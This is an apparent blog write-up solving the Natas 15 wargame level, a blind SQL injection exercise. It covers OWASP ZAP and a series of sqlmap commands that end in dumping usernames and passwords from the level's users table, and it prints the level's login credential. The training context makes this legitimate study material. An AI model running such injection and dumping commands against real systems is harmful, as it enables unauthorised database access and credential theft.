Natas 15 — SQL Injection with SQLMap
This is part… I’m not doing this part thing. All of Nata’s levels are numbered so this part is Natas 15 and that’s that. Now that we got the naming out of the way, lets dive in.
Opening natas15 we’re greeted with a form:
Lets try natas15…. “The user doesn’t exist”. What about natas16?
This level is, like natas 14, an injection level. But now we do not get a SQL response, even if we pass a debug param to get the query sent to MySQL.
Taking a look at the source code we find there is a users table. We just need to hack the params and their values to crack this level.
So, first things first. Get to OWASP ZAP and add a debug param to get the query, just like in natas 14:
Ok, we got a response but unlike Natas 14 the response is always a “This user exists”.
It’s time to use one of the best tools from our toolbelt when dealing with SQL Injection: SQLMap. I’ve written a cheat sheet for SQLMap available here. SQLMap is a fantastic command-line tool. I recommend you to take a moment to visit the homepage and star the Github project.
Back to our hack. Open a terminal window and type
$ sqlmap --help
I’m not covering the installation of the tool. I’m assuming the usage of a security distro like Kali or Parrot which have sqlmap installed.
Our SQLMap command with the parameters will look like:
$ sqlmap -u “http://natas15.natas.labs.overthewire.org/index.php?debug" --proxy=http://127.0.0.1:8080 --string=”This user exists” --auth-type=Basic --auth-cred=natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J --data “username=natas16”
Lets break it to pieces:
- u http://natas15.natas.labs.overthewire.org/index.php?debug: the url of out target
- proxy=http://127.0.0.1:8080: we’ll redirect all sqlmap traffic through ZAP
- string=”This user exists”: string to match when query is evaluated to True
- auth-type=Basic: http authentication type
- auth-cred=natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J: natas15 credencials
- data “username=natas16”: our param
Lets add the risk and level params:
$ sqlmap -u “http://natas15.natas.labs.overthewire.org/index.php?debug" --proxy=http://127.0.0.1:8080 --string=”This user exists” --auth-type=Basic --auth-cred=natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J --data “username=natas16” --level=5 --risk=3
This is good news, the app is vulnerable. Through the source code we know the data we’re after is stored in a MySQL DBMS, the database is ‘natas15', the table is ‘users’, and the column is ‘password’. Just add the enumeration params to the command:
$ sqlmap -u “http://natas15.natas.labs.overthewire.org/index.php?debug" --proxy=http://127.0.0.1:8080 --string=”This user exists” -- auth-type=Basic --auth-cred=natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J --data “username=natas16” --level=5 --risk=3 -D natas15 -T users -C username,password --dump
There’s our prize. See you for natas 16.
